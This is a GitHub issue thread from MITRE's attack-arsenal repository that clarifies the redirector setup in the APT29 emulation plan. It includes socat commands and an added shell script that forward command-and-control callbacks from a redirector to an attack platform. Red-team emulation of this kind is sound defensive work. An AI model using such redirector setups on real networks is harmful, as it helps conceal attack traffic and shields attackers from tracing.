mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0

Possible documentation correction or clarification: Redirector setup #16

Closed holisticinfosec closed 3 years ago

holisticinfosec commented 3 years ago

For the APT29 Day Emulation Plan, under Red Team setup, it currently reads:

    Setup Redirector: 192.168.0.5 (or the value used for the Redirector IP)
    From the redirector system, setup port forwarding using Socat
    sudo socat TCP-LISTEN:443,fork TCP:192.168.0.4:443 &
    sudo socat TCP-LISTEN:1234,fork TCP:192.168.0.4:1234 &
    sudo socat TCP-LISTEN:8443,fork TCP:192.168.0.4:8443 &

I believe it should read:

    sudo socat TCP-LISTEN:443,fork TCP:192.168.0.5:443 &
    sudo socat TCP-LISTEN:1234,fork TCP:192.168.0.5:1234 &
    sudo socat TCP-LISTEN:8443,fork TCP:192.168.0.5:8443 &

jcwilliamsATmitre commented 3 years ago

hey @holisticinfosec!

These port forwarding commands are intended to be run on the redirector (192.168.0.5) in order to forward any callbacks over those 3 ports to the attacker platform (192.168.0.4). Hopefully that clarifies the confusion!
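The layout the maintainer describes, as an added example that is not part of the attack-arsenal repository: a small script meant to be run on the redirector host (192.168.0.5 in the plan) that builds the same three socat forwarders toward the attack platform (192.168.0.4), refuses to start if the forward target is one of the local host's own addresses (the mix-up raised in this issue, which would make each listener relay back to itself), and then checks that the listeners came up. It assumes a Linux redirector with `hostname -I` or `ip`, `ss` and `sudo` available; the `reuseaddr` option is an addition to the plan's original `fork`-only commands so a forwarder can be restarted without waiting out TIME_WAIT.

```shell
#!/bin/sh
# Added example: redirector-side socat forwarding for the APT29 emulation layout.
# Not part of the attack-arsenal repository. Run this ON the redirector host
# (192.168.0.5 in the plan); ATTACKER_IP is the attack platform (192.168.0.4)
# that every callback hitting the redirector should be relayed to.

ATTACKER_IP="${ATTACKER_IP:-192.168.0.4}"
PORTS="${PORTS:-443 1234 8443}"

# One forwarder: accept on port $1 on every local interface, relay each
# connection (fork) to the same port on $2. reuseaddr is added here so the
# listener can be restarted immediately; the plan's own commands use fork alone.
socat_cmd() {
    printf 'socat TCP-LISTEN:%s,fork,reuseaddr TCP:%s:%s' "$1" "$2" "$1"
}

# Print the whole plan, one command per line: forward_plan <target_ip> "<ports>"
forward_plan() {
    _target="$1"
    for _p in $2; do
        socat_cmd "$_p" "$_target"
        printf '\n'
    done
}

# The mix-up from the issue: pointing the forwarders at the redirector's own IP
# would make each listener relay to itself. $1 = target, remaining = local IPs.
target_is_local() {
    _t="$1"; shift
    for _a in "$@"; do
        [ "$_a" = "$_t" ] && return 0
    done
    return 1
}

# Local IPv4 addresses of this host (Linux; assumes hostname -I or iproute2).
local_ipv4_addrs() {
    hostname -I 2>/dev/null || ip -4 -o addr show 2>/dev/null | awk '{sub("/.*", "", $4); print $4}'
}

# Succeed only if something is listening on TCP $1
# (column 4 of `ss -ltn` is Local Address:Port, e.g. 0.0.0.0:443 or [::]:443).
listening_on() {
    ss -ltn 2>/dev/null | awk -v port="$1" '$4 ~ (":" port "$") { found = 1 } END { exit !found }'
}

main() {
    # shellcheck disable=SC2046
    if target_is_local "$ATTACKER_IP" $(local_ipv4_addrs); then
        echo "refusing: $ATTACKER_IP is an address of this host." >&2
        echo "Run this on the redirector and set ATTACKER_IP to the attack platform." >&2
        return 1
    fi
    for _p in $PORTS; do
        # sudo is needed for the privileged port 443; eval runs the built command string.
        eval "sudo $(socat_cmd "$_p" "$ATTACKER_IP") &"
    done
    sleep 1
    for _p in $PORTS; do
        if listening_on "$_p"; then
            echo "redirector listening on $_p -> $ATTACKER_IP:$_p"
        else
            echo "no listener on $_p; check the socat output above" >&2
        fi
    done
}

# Only act when invoked with --apply, so the file can also be sourced for its functions.
case "${1:-}" in
    --apply) main ;;
esac
```

Usage on the redirector: `ATTACKER_IP=192.168.0.4 sh redirector.sh --apply`. Running the same script on the attack platform itself, or with ATTACKER_IP set to the redirector's address, trips the guard instead of silently creating listeners that forward to themselves.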

holisticinfosec commented 3 years ago

Derp, gotcha. ID 10 T error. Thank you!


-- Russ McRee, GSE (http://www.giac.org/certified-professional/russ-mcree/106487), MSISE, CISSP, @holisticinfosec (https://twitter.com/holisticinfosec), http://holisticinfosec.org, http://blog.holisticinfosec.org